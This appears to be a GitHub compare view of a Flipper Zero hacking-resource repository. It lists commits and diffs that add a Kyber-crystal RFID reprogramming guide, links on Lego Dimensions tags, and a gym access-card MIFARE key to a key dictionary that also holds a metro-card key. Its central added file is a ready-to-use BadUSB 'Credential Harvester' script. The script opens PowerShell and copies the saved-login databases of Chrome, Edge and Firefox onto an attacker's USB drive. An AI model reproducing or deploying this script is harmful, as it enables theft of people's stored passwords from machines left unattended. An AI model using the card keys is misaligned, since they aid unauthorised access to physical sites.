Compare commits

..

14 Commits

Author SHA1 Message Date
UberGuidoZ
663bcb39c4 Updated submodule 2024-05-16 19:30:34 -07:00
UberGuidoZ
065ef82511 Updated submodule 2024-05-16 19:00:37 -07:00
UberGuidoZ
cb6c10c43f
Merge pull request #587 from FalsePhilosopher/patch-1
Got crys?
2024-05-16 15:34:46 -07:00
UberGuidoZ
4bd6da3c56
Merge pull request #588 from qKOMAPp/patch-1
Add Orenburg Lime Fitness A key
2024-05-16 15:33:54 -07:00
UberGuidoZ
c6b4361f87
Commented out blank lines to avoid possible issues 2024-05-16 15:32:27 -07:00
UberGuidoZ
9e54a64755
Fixed name and admin perms statement 2024-05-16 15:31:45 -07:00
UberGuidoZ
02c7fb1626
Merge pull request #589 from MarkCyber/main
Credential Harvester For Flipper
2024-05-16 15:30:40 -07:00
Mark
74bf26076e
Merge pull request #1 from MarkCyber/MarkCyber-CredentialHarvester
Create CredentialHarvesterByMarkCyber
2024-05-14 11:57:55 -04:00
Mark
701953acde
Create CredentialHarvesterByMarkCyber
Harvests all credentials from chrome, firefox and edge while saving it to a secondary USB for further analysis. Name the secondary usb "MYUSB" for this to work properly.
2024-05-14 11:52:39 -04:00
Vadim Govorov-Kalinyuck
8f87edde7a
Add Orenburg Lime Fitness A key 2024-05-14 17:45:18 +05:00
FalsePhilosopher
380d4fc31c
Create Lego-Dimensions.md 2024-05-13 01:29:51 -06:00
FalsePhilosopher
4639c08973
Update and rename Kyber-Crystals.md to readme.md 2024-05-12 23:58:25 -06:00
FalsePhilosopher
8182aa0d03
Add files via upload
Boo for locked docs!
2024-05-12 23:36:46 -06:00
FalsePhilosopher
1f5286d6f2
Create Kyber-Crystals.md 2024-05-12 23:16:38 -06:00
9 changed files with 119 additions and 1 deletions

View File

@ -0,0 +1,62 @@
REM This script was created by github.com/MarkCyber
REM Harvests all credentials from chrome, edge, and firefox
REM This script requires a secondary USB named "MYUSB" to save credentials to
REM The extracted data will require decryption
REM
REM Set delay for Flipper Zero
DELAY 1000
REM
REM Open PowerShell without elevated privileges
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
STRING echo off | clip
ENTER
DELAY 500
REM
REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out my other badusb scripts on github.com/MarkCyber

@ -1 +1 @@
Subproject commit 79a892ed2cad6ce8954ae7f59868dd476485373e Subproject commit c5a829902c9044474ccb5d4607696c8b94d60e54

Binary file not shown.

After

Width:  |  Height:  |  Size: 114 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 148 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 126 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 202 KiB

View File

@ -0,0 +1,50 @@
# Kyber Crystals
A how to program crystals from https://sabersourcing.com/2019/10/30/kyber-crystal-rfid-hack-star-wars-galaxys-edge/
1. Turn on RFID Reader/Writer (make sure its set to 125KHz). Hold the kyber crystal next to the device and click the “Read” button. The device will say “Read success” and recite the current RFID number of the kyber crystal.
2. Next, click the “Input” button. Enter the four digit number for your desired lightsaber blade color and dialogue set (see the complete list of RFID codes below). Press “Input” one more time.
3. Hold the kyber crystal next to the device and the click the “Write” button. If desired, use one of the option RFID key fobs instead of the kyber crystal itself. The device will say “Write success” to indicate that writing to the device worked.
4. Now you have reprogrammed the kyber crystal! Attach the kyber crystal to your Jedi Holocron or Sith Holocron to hear the dialogue of the reprogrammed kyber crystal. Alternatively, install the kyber crystal in your Savis Workshop lightsaber to view the new blade color.
From this froum post by mrgoodfellow https://forum.flipper.net/t/star-wars-galaxy-s-edge-kyber-crystal/2611/11
I have scanned several crystals and the example contents are:
BlueKyber.rfid -
Filetype: Flipper RFID key
Version: 1
Key type: EM4100
Data: 00 00 00 0C 0E
Here is a table of HEX converted values:
Ahsoka Tano dialogue White 3072 0000000C00
Darth Vader dialogue Red 3073 0000000C01
Unreleased Orange 3074 0000000C02
Jedi Temple Guard dialogue Yellow 3075 0000000C03
Qui-Gon Jinn dialogue Green 3076 0000000C04
Unreleased Teal 3077 0000000C05
Obi-Wan Kenobi (Original Trilogy era) dialogue Blue 3078 0000000C06
Mace Windu (set 1) dialogue Purple 3079 0000000C07
Chirrut Imwe dialogue White 3080 0000000C08
Emperor Palpatine dialogue Red 3081 0000000C09
Count Dooku dialogue Red 3082 0000000C0A
Maz Kanata dialogue Yellow 3083 0000000C0B
Yoda dialogue Green 3084 0000000C0C
Darth Maul dialogue Red 3085 0000000C0D
Luke Skywalker (Sequel Trilogy era) dialogue Blue 3086 0000000C0E
Mace Windu (set 2) dialogue Purple 3087 0000000C0F
Darth Vader (Magic 8 Ball) dialogue Red 3121 0000000C31
Yoda (Magic 8 Ball) dialogue Green 3122 0000000C32
Snoke dialogue (note: this is from the black kyber crystal) Red 3123 0000000C33
I have been unsuccessful at unlocking or flashing any of the crystals or getting the flipper to emulate a crystal next to the saber in a way that changes the color. I have ordered some re-writable chips to create my own re-writable crystal. I will see if I have any success with them.
Here is a bunch of screenshots from https://docs.google.com/spreadsheets/d/1mZMBBxSc_ltAyheEVgKL4MpGfPc3iCjR1S6BEaavN40/edit#gid=1994856546
(for some stupid reason they tuned off saving the doc to make things easy, so thank who ever did that and enjoy the pics lol)
Updated 5/12/24
![P1](Blade-Commands-KC.png)
![P2](V1-Crystals-KC.png)
![P3](V1-Data-Sorting-KC.png)
![P4](V2-Data-KC.png)

View File

@ -0,0 +1,3 @@
# Lego Dimensions
Everything you need to know is here https://github.com/dolmen-go/legodim
And here http://www.proxmark.org/forum/viewtopic.php?id=2657

View File

@ -2355,3 +2355,6 @@ C1F6C7B55F5E
# #
# Metro card Sec 001 Blk 007 key B # Metro card Sec 001 Blk 007 key B
EDA4BF3E7B04 EDA4BF3E7B04
#
# Lime Fitness
113355779933